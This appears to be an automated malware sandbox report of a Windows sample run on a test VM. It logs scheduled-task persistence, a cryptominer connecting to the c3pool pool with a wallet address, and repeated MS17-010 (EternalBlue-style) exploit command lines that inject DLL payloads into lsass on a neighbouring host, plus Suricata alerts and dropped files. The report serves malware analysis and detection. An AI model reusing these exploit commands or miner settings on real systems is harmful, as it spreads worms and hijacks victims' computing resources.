Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 15, 2024, 8:16 a.m. | June 15, 2024, 8:19 a.m. |
-
cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
3032-
schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
1484
-
-
-
taskkill.exe taskkill /f /im spreadEmnopq.exe
2168
-
-
-
ipconfig.exe ipconfig /flushdns
2604
-
-
spreadEmnopq.exe C:\ProgramData\spreadEmnopq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p WPU --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2528 -
-
ipconfig.exe ipconfig /flushdns
1632
-
-
SMB.exe C:\ProgramData\SMB.exe
2736 -
-
ipconfig.exe ipconfig /flushdns
2204
-
-
-
ipconfig.exe ipconfig /flushdns
3284
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3556-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3652
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3592-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3748
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3688-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3964
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3772-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
4036
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3848-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3404
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3920-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3616
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4000-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3860
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3188-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3308
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3680-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3692
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3948-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3900
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3596-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3776
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3808-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3648
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3852-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3736
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3656-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
3880
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3716-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
2372
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4012-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
4144
-
-
-
ipconfig.exe ipconfig /flushdns
4240
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
3384-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
4368
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4164-
svchostromance.exe svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
4472
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4288-
svchostlong.exe svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt
4528
-
-
cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
4352-
svchostlong.exe svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt
4576
-
-
-
ipconfig.exe ipconfig /flushdns
4876
-
-
-
ipconfig.exe ipconfig /flushdns
3876
-
-
-
ipconfig.exe ipconfig /flushdns
5548
-
-
-
ipconfig.exe ipconfig /flushdns
5808
-
Name | Response | Post-Analysis Lookup |
---|---|---|
103.56.168.192.in-addr.arpa | ||
are.nishabig.pro | ||
auto.c3pool.org | 18.163.115.97 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49172 -> 47.76.164.119:19999 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
TCP 192.168.56.101:50052 -> 192.168.56.103:445 | 2024217 | ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray | A Network Trojan was detected |
TCP 192.168.56.103:445 -> 192.168.56.101:50052 | 2024218 | ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response | A Network Trojan was detected |
TCP 192.168.56.101:50581 -> 192.168.56.103:135 | 2001581 | ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.101:49172 -> 47.76.164.119:19999 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
Suricata TLS
No Suricata TLS
section | .gfids |
section | .giats |
resource name | LNK |
resource name | SMB |
resource name | X64 |
resource name | X86 |
suspicious_features | Connection to IP address | suspicious_request | OPTIONS http://192.168.56.1/ | ||||||
suspicious_features | Connection to IP address | suspicious_request | OPTIONS http://192.168.56.1/ipc$ |
request | OPTIONS http://192.168.56.1/ |
request | OPTIONS http://192.168.56.1/ipc$ |
name | LNK | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00874428 | size | 0x0005d332 | ||||||||||||||||||
name | SMB | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00563fa0 | size | 0x00310484 | ||||||||||||||||||
name | X64 | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x003971a0 | size | 0x0014c800 | ||||||||||||||||||
name | X86 | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x004e39a0 | size | 0x00080600 |
file | C:\ProgramData\pcrecpp-0.dll |
file | C:\ProgramData\libiconv-2.dll |
file | C:\ProgramData\posh.dll |
file | C:\ProgramData\trch-0.dll |
file | C:\ProgramData\pcre-0.dll |
file | C:\ProgramData\trfo-2.dll |
file | C:\ProgramData\riar-2.dll |
file | C:\ProgramData\pcreposix-0.dll |
file | C:\ProgramData\coli-0.dll |
file | C:\ProgramData\tibe-2.dll |
file | C:\ProgramData\libxml2.dll |
file | C:\ProgramData\tibe-1.dll |
file | C:\ProgramData\xdvl-0.dll |
file | C:\ProgramData\adfw.dll |
file | C:\ProgramData\cnli-0.dll |
file | C:\ProgramData\esco-0.dll |
file | C:\ProgramData\svchostlong.exe |
file | C:\ProgramData\crli-0.dll |
file | C:\ProgramData\dmgd-1.dll |
file | C:\ProgramData\cnli-1.dll |
file | C:\ProgramData\iconv.dll |
file | C:\ProgramData\tucl-1.dll |
file | C:\ProgramData\svchostromance.exe |
file | C:\ProgramData\exma-1.dll |
file | C:\ProgramData\etchCore-0.x64.dll |
file | C:\ProgramData\etch-0.dll |
file | C:\ProgramData\etchCore-0.x86.dll |
file | C:\ProgramData\tibe.dll |
file | C:\ProgramData\posh-0.dll |
file | C:\ProgramData\etebCore-2.x86.dll |
file | C:\ProgramData\trfo.dll |
file | C:\ProgramData\tucl.dll |
file | C:\ProgramData\X86.dll |
file | C:\ProgramData\adfw-2.dll |
file | C:\ProgramData\libcurl.dll |
file | C:\ProgramData\exma.dll |
file | C:\ProgramData\zibe.dll |
file | C:\ProgramData\trfo-0.dll |
file | C:\ProgramData\riar.dll |
file | C:\ProgramData\zlib1.dll |
file | C:\ProgramData\serverlong.exe |
file | C:\ProgramData\ssleay32.dll |
file | C:\ProgramData\pcla-0.dll |
file | C:\ProgramData\eteb-2.dll |
file | C:\ProgramData\libeay32.dll |
file | C:\ProgramData\dmgd-4.dll |
file | C:\ProgramData\etebCore-2.x64.dll |
file | C:\ProgramData\X64.dll |
file | C:\ProgramData\trch.dll |
file | C:\ProgramData\trch-1.dll |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
